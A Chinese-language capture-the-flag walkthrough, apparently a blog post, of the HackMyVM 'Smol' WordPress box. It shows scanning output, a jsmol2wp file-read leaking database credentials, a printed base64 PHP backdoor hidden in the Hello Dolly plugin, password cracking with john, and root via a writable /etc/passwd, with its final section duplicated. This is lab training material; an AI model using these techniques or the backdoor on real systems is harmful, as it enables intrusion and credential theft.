信息收集
┌──(root?kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:10 (Unknown: locally administered)
192.168.56.100 08:00:27:eb:ec:71 (Unknown)
192.168.56.110 08:00:27:6a:b5:9b (Unknown)3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.200 seconds (116.36 hosts/sec). 3 responded
┌──(root?kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.110
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-03 03:20 EST
Nmap scan report for www.smol.hmv (192.168.56.110)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: AnotherCTF
|_http-generator: WordPress 6.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:6A:B5:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
滲透
訪問80端口會重定向到www.smol.hmv
配置一下hosts文件
[外鏈圖片轉存中…(img-wLhJUZGs-1742267017316)]
┌──(root?LAPTOP-40PQI58C)-[~]
└─# wpscan --url http://www.smol.hmv/ -e u,ap --plugins-detection aggressive
_________________________________________________________________ _______ _____\ \ / / __ \ / ____|\ \ /\ / /| |__) | (___ ___ __ _ _ __ ?\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \\ /\ / | | ____) | (__| (_| | | | |\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.27Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://www.smol.hmv/ [192.168.56.110]
[+] Started: Mon Mar 3 17:03:30 2025Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:| - http://codex.wordpress.org/XML-RPC_Pingback_API| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://www.smol.hmv/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:| - https://www.iplocation.net/defend-wordpress-from-ddos| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 6.3 identified (Insecure, released on 2023-08-08).| Found By: Rss Generator (Passive Detection)| - http://www.smol.hmv/index.php/feed/, <generator>https://wordpress.org/?v=6.3</generator>| - http://www.smol.hmv/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.3</generator>[+] WordPress theme in use: popularfx| Location: http://www.smol.hmv/wp-content/themes/popularfx/| Last Updated: 2024-11-19T00:00:00.000Z| Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt| [!] The version is out of date, the latest version is 1.2.6| Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5| Style Name: PopularFX| Style URI: https://popularfx.com| Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...| Author: Pagelayer| Author URI: https://pagelayer.com|| Found By: Css Style In Homepage (Passive Detection)|| Version: 1.2.5 (80% confidence)| Found By: Style (Passive Detection)| - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'[+] Enumerating All Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:01:14 <==================================> (109325 / 109325) 100.00% Time: 00:01:14
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] akismet| Location: http://www.smol.hmv/wp-content/plugins/akismet/| Last Updated: 2025-02-14T18:49:00.000Z| Readme: http://www.smol.hmv/wp-content/plugins/akismet/readme.txt| [!] The version is out of date, the latest version is 5.3.7|| Found By: Known Locations (Aggressive Detection)| - http://www.smol.hmv/wp-content/plugins/akismet/, status: 200|| Version: 5.2 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)| - http://www.smol.hmv/wp-content/plugins/akismet/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)| - http://www.smol.hmv/wp-content/plugins/akismet/readme.txt[+] jsmol2wp| Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/| Latest Version: 1.07 (up to date)| Last Updated: 2018-03-09T10:28:00.000Z| Readme: http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/, status: 200|| Version: 1.07 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] think| Found By: Author Posts - Author Pattern (Passive Detection)| Confirmed By:| Wp Json Api (Aggressive Detection)| - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[+] wp| Found By: Author Posts - Author Pattern (Passive Detection)| Confirmed By:| Wp Json Api (Aggressive Detection)| - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1| Author Id Brute Forcing - Author Pattern (Aggressive Detection)[+] Jose Mario Llado Marti| Found By: Rss Generator (Passive Detection)[+] wordpress user| Found By: Rss Generator (Passive Detection)[+] admin| Found By: Wp Json Api (Aggressive Detection)| - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1| Confirmed By:| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[+] diego| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] gege| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[+] xavi| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Confirmed By: Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register[+] Finished: Mon Mar 3 17:04:55 2025
[+] Requests Done: 109398
[+] Cached Requests: 10
[+] Data Sent: 29.374 MB
[+] Data Received: 14.995 MB
[+] Memory used: 489.035 MB
[+] Elapsed time: 00:01:25
根據wpscan 得出的結果我們可以知道
靶機網站的WordPress裝有 jsmol2wp這個插件。
這個插件版本號<=1.07有一個CVE
同時還發現網站有admin wpuser think gege diego xavi
這幾個用戶
我使用文件讀取漏洞去讀取wp-config.php文件在里面找到了一個數據庫賬號和密碼
/** Database username */
define( 'DB_USER', 'wpuser' );/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );/** Database hostname */
define( 'DB_HOST', 'localhost' );/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
WordPress網站中同樣有一個wpuser用戶
然后我就嘗試使用這個密碼來登錄WordPress
[外鏈圖片轉存中…(img-hTCGgT6z-1742267017318)]
登錄進來以后發現wpuser貌似只是一個普通的用戶
沒有我想要的編輯插件/主題的源代碼的功能
然后暫時我簡單的測試了一下文件上傳功能沒有什么進展之后,我就在這個方向上就沒有什么思路了
我又在即將目光放在jsmol2wp的漏洞上
我了解到這個版本的jsmol2wp還存在一個SSRF漏洞
于是我就嘗試了一下拿Gopher協議來攻擊MySQL數據庫從而給網站寫木馬
很遺憾我沒有成功
后來我在一個Webmaster Tasks!!的貼子上發現了一點信息
[外鏈圖片轉存中…(img-z4X8owby-1742267017318)]
說要排查存在后面的插件Hello Dolly
┌──(root?kali)-[~kali/Desktop]
└─# dirsearch -u "http://www.smol.hmv/" -w SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 13370Output File: /home/kali/Desktop/reports/http_www.smol.hmv/__25-03-03_04-29-49.txtTarget: http://www.smol.hmv/[04:29:49] Starting:
[04:29:52] 200 - 0B - /wp-content/plugins/akismet/
[04:30:15] 500 - 0B - /wp-content/plugins/hello.php
[04:30:15] 500 - 0B - /wp-content/plugins/hello.php/
我又對網站目錄FUZZ了一遍
發現了hello.php的存在
我再次使用jsmol2wp的漏洞
讀取了hello.php的源碼
?php
/*** @package Hello_Dolly* @version 1.7.2*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/function hello_dolly_get_lyric() {/** These are the lyrics to Hello Dolly */$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";// Here we split it into lines.$lyrics = explode( "\n", $lyrics );// And then randomly choose a line.return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}// This just echoes the chosen line, we'll position it later.
function hello_dolly() {eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));$chosen = hello_dolly_get_lyric();$lang = '';if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {$lang = ' lang="en"';}printf('<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',__( 'Quote from Hello Dolly song, by Jerry Herman:' ),$lang,$chosen);
}// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );// We need some CSS to position the paragraph.
function dolly_css() {echo "<style type='text/css'>#dolly {float: right;padding: 5px 10px;margin: 0;font-size: 12px;line-height: 1.6666;}.rtl #dolly {float: left;}.block-editor-page #dolly {display: none;}@media screen and (max-width: 782px) {#dolly,.rtl #dolly {float: none;padding-left: 0;padding-right: 0;}}</style>";
}add_action( 'admin_head', 'dolly_css' );
在hello_dolly()函數中后一個后門
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
base64解碼之后就是
if (isset($_GET["cmd"])) { system($_GET["cmd"]); }
但是他的觸發條件是add_action( 'admin_notices', 'hello_dolly' );
當觸發admin_notices的時候就會執行這個函數
我們使用 wpuser用戶進入后臺的時候剛好有一個admin_notices
[外鏈圖片轉存中…(img-lZEAE9fX-1742267017318)]
嘗試在這個頁面執行命令
執行成功
[外鏈圖片轉存中…(img-by9cVx0a-1742267017318)]
然后我上傳了一個shell.php文件用于反彈shell
一個sql.php用來從數據庫中查詢出所用的用戶名與密碼
[外鏈圖片轉存中…(img-TUHyCg1F-1742267017319)]
┌──(root?LAPTOP-40PQI58C)-[~/Desktop]
└─# john passwd --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (?)
hero_gege@hotmail.com (?)
2g 0:00:19:33 DONE (2025-03-02 21:39) 0.001704g/s 12226p/s 56527c/s 56527C/s !!!@@@!!!..*7?Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
破解出了diego與gege的密碼
同時這個密碼也是diego的ssh密碼
www-data@smol:/var/www/wordpress/wp-admin$ whoami
whoami
www-data
www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
whoami
diego
user‘s flag就在diego的home目錄下
我嘗試了使用密碼登錄ssh
但是diego gege think xavi
這四個用戶都被禁止遠程用密碼登錄
我在diego的home目錄下面寫了一個ssh 公鑰然后成功用ssh登錄進去了
┌──(kali?kali)-[~]
└─$ ssh diego@192.168.56.110
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Mon 03 Mar 2025 05:48:15 PM UTCSystem load: 0.01 Processes: 194Usage of /: 57.2% of 9.75GB Users logged in: 0Memory usage: 32% IPv4 address for enp0s17: 192.168.56.110Swap usage: 0%Expanded Security Maintenance for Applications is not enabled.162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradableEnable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro statusThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsLast login: Sun Mar 2 21:58:36 2025 from 192.168.56.103
diego@smol:~$ whoami
diego
diego@smol:~$
diego gege think xavi這個四個用戶都在一個組里面 可以互相訪問各自的home目錄
diego@smol:/home$ ls -al
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 4 diego internal 4096 Mar 2 22:19 diego
drwxr-x--- 7 gege internal 4096 Mar 2 22:45 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
diego@smol:/home$
think用戶的home目錄有一個.ssh目錄
diego@smol:/home/think$ ls -al
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
diego@smol:/home/think$ ls -al .ssh/
total 20
drwxr-xr-x 2 think think 4096 Jun 21 2023 .
drwxr-x--- 5 think internal 4096 Jan 12 2024 ..
-rwxr-xr-x 1 think think 572 Jun 21 2023 authorized_keys
-rwxr-xr-x 1 think think 2602 Jun 21 2023 id_rsa
-rwxr-xr-x 1 think think 572 Jun 21 2023 id_rsa.pub
diego@smol:/home/think$
diego用戶對他有r權限
然后我就讀取了think用戶的私鑰
然后ssh遠程登錄think
┌──(root?kali)-[/home/kali]
└─# ssh -i id_rsa think@192.168.56.110
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Mon 03 Mar 2025 05:52:14 PM UTCSystem load: 0.02 Processes: 203Usage of /: 57.2% of 9.75GB Users logged in: 1Memory usage: 33% IPv4 address for enp0s17: 192.168.56.110Swap usage: 0%Expanded Security Maintenance for Applications is not enabled.162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradableEnable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro statusThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settingsLast login: Mon Mar 3 15:54:04 2025 from 192.168.56.103
think@smol:~$
成功登錄但是think 執行sudo -l的時候需要輸入密碼
我不知道think的密碼
當我沒有什么思路的時候我無意間使用think的身份執行了一次su gege的命令
發現無需輸入密碼成功切換到gege用戶身份
think@smol:~$ su gege
gege@smol:/home/think$ whoami
gege
gege@smol:/home/think$
gege用戶的home目錄下有一個wordpress.old.zip文件
但是解壓它需要密碼
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ unzip wordpress.old.zip
Archive: wordpress.old.zipcreating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password:
我復制一份到到我的kali上面 使用john破解
┌──(root?kali)-[/home/kali/Desktop]
└─# john wordpress --show
wordpress.old.zip:hero_gege@hotmail.com::wordpress.old.zip:wordpress.old/wp-content/plugins/akismet/index.php, wordpress.old/wp-content/index.php, wordpress.old/wp-content/plugins/index.php, wordpress.old/wp-content/themes/index.php, wordpress.old/wp-includes/blocks/spacer/style.min.css, wordpress.old/wp-includes/blocks/spacer/style-rtl.min.css, wordpress.old/wp-includes/blocks/spacer/style.css, wordpress.old/wp-includes/blocks/spacer/style-rtl.css:wordpress.old.zip1 password hash cracked, 0 left
將其解壓之后。
在它的wp-config文件中發現了xavi的密碼
[外鏈圖片轉存中…(img-Mb1gKInf-1742267017319)]
提權
su切換到xavi用戶后,執行sudo -l
gege@smol:~/wordpress.old$ su xavi
Password:
xavi@smol:/home/gege/wordpress.old$ whoami
xavi
xavi@smol:/home/gege/wordpress.old$ sudo -l
[sudo] password for xavi:
Matching Defaults entries for xavi on smol:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser xavi may run the following commands on smol:(ALL : ALL) /usr/bin/vi /etc/passwd
xavi@smol:/home/gege/wordpress.old$
可以編輯/etc/passwd
執行openssl passwd -1 -salt Yliken 123456生成一段hasg
然后將其寫入passwd
[外鏈圖片轉存中…(img-T4i3Cbto-1742267017320)]
然后su Yliken
xavi@smol:/home/gege/wordpress.old$ su Yliken
Password:
root@smol:/home/gege/wordpress.old$ whoami
root
root@smol:/home/gege/wordpress.old$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/gege/wordpress.old$
/etc/passwd
執行openssl passwd -1 -salt Yliken 123456生成一段hasg
然后將其寫入passwd
然后su Yliken
xavi@smol:/home/gege/wordpress.old$ su Yliken
Password:
root@smol:/home/gege/wordpress.old$ whoami
root
root@smol:/home/gege/wordpress.old$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/gege/wordpress.old$
